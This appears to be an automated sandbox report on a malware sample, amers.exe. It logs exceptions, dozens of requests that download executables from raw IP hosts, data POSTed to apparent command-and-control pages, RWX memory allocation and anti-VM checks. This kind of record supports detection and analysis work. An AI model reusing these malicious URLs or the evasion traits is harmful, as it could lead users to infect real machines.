__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 68 f2 f2 57 63 ff 34 24 e9 5a 08 00 00 89 0c exception.symbol: amers+0x24b608 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2405896 exception.address: 0x144b608 registers.esp: 2685332 registers.edi: 285608268 registers.eax: 4294941176 registers.ebp: 4009332756 registers.edx: 2130566132 registers.ebx: 605849941 registers.esi: 21309160 registers.ecx: 1596456960	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 50 89 2c 24 e9 e4 f9 ff ff 50 e9 00 00 00 00 exception.symbol: amers+0x2526ea exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2434794 exception.address: 0x14526ea registers.esp: 2685328 registers.edi: 21284398 registers.eax: 28209 registers.ebp: 4009332756 registers.edx: 975416 registers.ebx: 21284366 registers.esi: 21307531 registers.ecx: 1596456960	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb e9 d3 00 00 00 87 14 24 e9 cd 01 00 00 50 b8 exception.symbol: amers+0x25261b exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2434587 exception.address: 0x145261b registers.esp: 2685332 registers.edi: 21284398 registers.eax: 28209 registers.ebp: 4009332756 registers.edx: 880889937 registers.ebx: 21284366 registers.esi: 21310684 registers.ecx: 0	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 56 52 ba 3c 03 fd 3f 89 d6 5a 81 f6 b1 9f 7f exception.symbol: amers+0x26b4f6 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2536694 exception.address: 0x146b4f6 registers.esp: 2685328 registers.edi: 21389445 registers.eax: 28278 registers.ebp: 4009332756 registers.edx: 975416 registers.ebx: 21409996 registers.esi: 4613428 registers.ecx: 1596456960	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 50 54 e9 c1 fa ff ff 01 f7 81 ef 9c 59 94 3d exception.symbol: amers+0x26b60f exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2536975 exception.address: 0x146b60f registers.esp: 2685332 registers.edi: 21389445 registers.eax: 28278 registers.ebp: 4009332756 registers.edx: 975416 registers.ebx: 21438274 registers.esi: 4613428 registers.ecx: 1596456960	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 53 68 ac 39 38 03 89 2c 24 e9 51 f9 ff ff 89 exception.symbol: amers+0x26bac6 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2538182 exception.address: 0x146bac6 registers.esp: 2685332 registers.edi: 604292949 registers.eax: 4294941828 registers.ebp: 4009332756 registers.edx: 975416 registers.ebx: 21438274 registers.esi: 4613428 registers.ecx: 1596456960	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 56 50 89 14 24 56 be ef 8a f7 7f 83 ee 01 81 exception.symbol: amers+0x273608 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2569736 exception.address: 0x1473608 registers.esp: 2685332 registers.edi: 21472472 registers.eax: 29827 registers.ebp: 4009332756 registers.edx: 2130561268 registers.ebx: 21420271 registers.esi: 4374508 registers.ecx: 20982023	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 55 bd 12 ca fd 7f c1 e5 03 68 fa 17 b4 16 89 exception.symbol: amers+0x273ab5 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2570933 exception.address: 0x1473ab5 registers.esp: 2685332 registers.edi: 21445884 registers.eax: 0 registers.ebp: 4009332756 registers.edx: 2130561268 registers.ebx: 21420271 registers.esi: 4374508 registers.ecx: 604292947	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 81 c7 d8 2f 77 0a 81 ef 3f af a5 5b e9 78 02 exception.symbol: amers+0x27b27a exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2601594 exception.address: 0x147b27a registers.esp: 2685328 registers.edi: 21474622 registers.eax: 32282 registers.ebp: 4009332756 registers.edx: 108 registers.ebx: 945717957 registers.esi: 3776646094 registers.ecx: 109	1
__exception__ May 31, 2024, 7:29 a.m.	stacktrace: exception.instruction_r: fb 55 89 1c 24 e9 47 fc ff ff 81 ea 67 9d fd 6b exception.symbol: amers+0x27b6e4 exception.instruction: sti exception.module: amers.exe exception.exception_code: 0xc0000096 exception.offset: 2602724 exception.address: 0x147b6e4 registers.esp: 2685332 registers.edi: 21506904 registers.eax: 32282 registers.ebp: 4009332756 registers.edx: 108 registers.ebx: 945717957 registers.esi: 3776646094 registers.ecx: 109	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (39 events)

suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://147.45.47.70/tr8nomy/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.47.70/lend/33333.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.47.70/lend/fileosn.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.47.70/lend/lumma1234.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.47.70/lend/gold.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.47.70/lend/swizzzz.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.47.70/lend/file300un.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://147.45.47.70/lend/CoMachina.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.19/Newoff.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.172.128.19/ghsdh39s/index.php
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.19/FirstZ.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://judgecaption.hair/load/download.php?c=1002
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.172.128.82/server/12/AppGate2103v01.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://5.42.66.47/files/setup.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://5.42.66.47/files/kpow.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://85.192.56.26/api/bing_release.php
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://85.192.56.26/api/flash.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://5.42.66.10/download/th/getimage12.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://5.42.66.10/download/123p.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://77.91.77.33/current.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.172.128.159/dl.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.172.128.69/download.php?pub=inte
suspicious_features	Connection to IP address	suspicious_request	HEAD http://94.232.45.38/eee01/eee01.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://77.91.77.33/current.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.172.128.159/dl.php
suspicious_features	Connection to IP address	suspicious_request	GET http://185.172.128.69/download.php?pub=inte
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.66.10/download/th/getimage12.php
suspicious_features	Connection to IP address	suspicious_request	HEAD http://5.42.66.10/download/th/retail.php
suspicious_features	Connection to IP address	suspicious_request	GET http://94.232.45.38/eee01/eee01.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.66.10/download/123p.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://5.42.66.10/download/th/space.php
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.66.10/download/th/space.php
suspicious_features	Connection to IP address	suspicious_request	GET http://5.42.66.10/download/th/retail.php
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/E0rY26ni
suspicious_features	GET method with no useragent header	suspicious_request	GET https://yip.su/RNWPd.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://free.360totalsecurity.com/totalsecurity/360TS_Setup_Mini_WW.Marketator.CPI20230405_6.6.0.1054.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://bitbucket.org/qwizzi/tt522222/downloads/GroceryExtensive.exe

Performs some HTTP requests (50 out of 65 events)

request	POST http://147.45.47.70/tr8nomy/index.php
request	GET http://147.45.47.70/lend/33333.exe
request	GET http://147.45.47.70/lend/fileosn.exe
request	GET http://147.45.47.70/lend/lumma1234.exe
request	GET http://147.45.47.70/lend/gold.exe
request	GET http://147.45.47.70/lend/swizzzz.exe
request	GET http://147.45.47.70/lend/file300un.exe
request	GET http://147.45.47.70/lend/CoMachina.exe
request	GET http://185.172.128.19/Newoff.exe
request	POST http://185.172.128.19/ghsdh39s/index.php
request	GET http://185.172.128.19/FirstZ.exe
request	GET http://judgecaption.hair/load/download.php?c=1002
request	GET http://x1.i.lencr.org/
request	GET http://185.172.128.82/server/12/AppGate2103v01.exe
request	GET http://5.42.66.47/files/setup.exe
request	GET http://5.42.66.47/files/kpow.exe
request	GET http://s.360safe.com/360ts/mini_inst.htm?ver=6.6.0.1054&pid=WW.Marketator.CPI20230405&os=6.1&mid=3b96717f137ac716bab250f817240788&state=153
request	GET http://s.360safe.com/safei18n/query_env.htm?v611=DgY0MAEIaE8ANQABAACIxljg%2Bs3AO%2B0eWhzT0CCPWqvYqoW%2FAXsYCkM61lI%2BjOdsVPZofosJfkCESIQRWuogw%2Bxnis1yNTX%2BrFjUu6Agqzr7kjY%2FLdgky7wDkGwc1XBOmQC4lKBxt2mIp6Ntq%2FaVMIjGmvkz3VZAnrlTdRwC6RQbG5%2BLDjWJ1p%2FmKxXWoNNk700GNXR5xGTIwsxCwki4zsrmGoivJ0Qf9A45nkrMHdSG6RZfjTMCiFDkqsBk4iHajyAb4j%2F2JtKI4HfOJwBZ%2FBSRCThuwwfgVUkxwGsXYg37lTWkQgNdiCixMwoCkb770r4G4gQUR0%2FBAdU%2BEJinoJ3yydoquYw3e5hR%2BBmWS4tWrUz0bl9LrJXnrP5CcdiAJ3ITPstRbLsmxqf4VDOts1Z75JuBm6GmmA0kf4X7RZvIf2F8Ir5P0kmgaCKCvEm9ndsRxV5dZ%2F72AxQrWWc%3D
request	GET http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cab
request	GET http://s.360safe.com/safei18n/dimana.htm?lr=1&mid=3b96717f137ac716bab250f817240788&mod=360Installer.exe&ph=02a8342074eb25c8adb2d135e2bab7e5&p2p=1&t_id=360TS_Setup_For_Mini.cab&tads=656&tdl=656&tds=656&terr=0&tes=Status\|1,ErrorCode\|0,DnCount\|6,HttpNum\|1,DnFailCount\|6,FStatus\|1,P2SS\|656,P2PS\|0,PDMode\|2&tfl=656&tp=t&tst=1&ttdl=656&ttm=1000&ttup=120&vh=1.3.0.1361&vp=1.3.0.1320&softname=360TS
request	GET http://int.down.360safe.com/totalsecurity/360TS_Setup_11.0.0.1103.exe
request	GET http://sd.p.360safe.com/AC05282966EF28F0BC58DFBBE2E9591EF2A43BD6.trt
request	GET http://s.360safe.com/safei18n/dimana.htm?lr=1&mid=3b96717f137ac716bab250f817240788&mod=360Installer.exe&ph=BA320C501D0312BEC018E22653081CCD&p2p=1&t_id=360TS_Setup.exe&tads=14824882&tdl=103774176&tds=14571280&terr=0&tes=Status\|1,ErrorCode\|0,DnCount\|23,HttpNum\|18,DnFailCount\|22,FStatus\|1,P2SS\|103774176,P2PS\|0,PDMode\|3&tfl=103774176&tp=t&tst=1&ttdl=103774176&ttm=7219&ttup=120&vh=1.3.0.1361&vp=1.3.0.1320&softname=360TS
request	GET http://85.192.56.26/api/bing_release.php
request	GET http://apps.identrust.com/roots/dstrootcax3.p7c
request	GET http://s.360safe.com/360ts/mini_inst.htm?ver=6.6.0.1054&pid=WW.Marketator.CPI20230405&os=6.1&mid=3b96717f137ac716bab250f817240788&state=9&dt=7&size=103774176&ds=14824882.29
request	POST http://85.192.56.26/api/flash.php
request	HEAD http://5.42.66.10/download/th/getimage12.php
request	HEAD http://5.42.66.10/download/123p.exe
request	HEAD http://77.91.77.33/current.exe
request	HEAD http://185.172.128.159/dl.php
request	HEAD http://185.172.128.69/download.php?pub=inte
request	HEAD http://94.232.45.38/eee01/eee01.exe
request	HEAD http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
request	GET http://77.91.77.33/current.exe
request	HEAD http://judgecaption.hair/load/download.php?c=1001
request	HEAD http://fleur-de-lis.sbs/jhgfd
request	GET http://91.202.233.232/o2i3jroi23joj23ikrjokij3oroi.exe
request	GET http://185.172.128.159/dl.php
request	GET http://185.172.128.69/download.php?pub=inte
request	GET http://5.42.66.10/download/th/getimage12.php
request	HEAD http://5.42.66.10/download/th/retail.php
request	GET http://94.232.45.38/eee01/eee01.exe
request	GET http://5.42.66.10/download/123p.exe
request	GET http://judgecaption.hair/load/download.php?c=1001
request	GET http://fleur-de-lis.sbs/jhgfd
request	HEAD http://5.42.66.10/download/th/space.php
request	GET http://5.42.66.10/download/th/space.php
request	GET http://5.42.66.10/download/th/retail.php
request	GET https://pastebin.com/raw/E0rY26ni

Sends data using the HTTP POST Method (3 events)

request	POST http://147.45.47.70/tr8nomy/index.php
request	POST http://185.172.128.19/ghsdh39s/index.php
request	POST http://85.192.56.26/api/flash.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 641 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01201000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00500000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00970000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bf0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00e90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ea0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00fb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00fc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00fd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01120000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x011b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ca0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ec0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00be0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 1712 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x03340000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:22 a.m.	process_identifier: 1236 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000006800000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7793f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 188416 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01061000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00600000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00610000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bc0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00bd0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 7:29 a.m.	process_identifier: 2388 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00d80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (4 events)

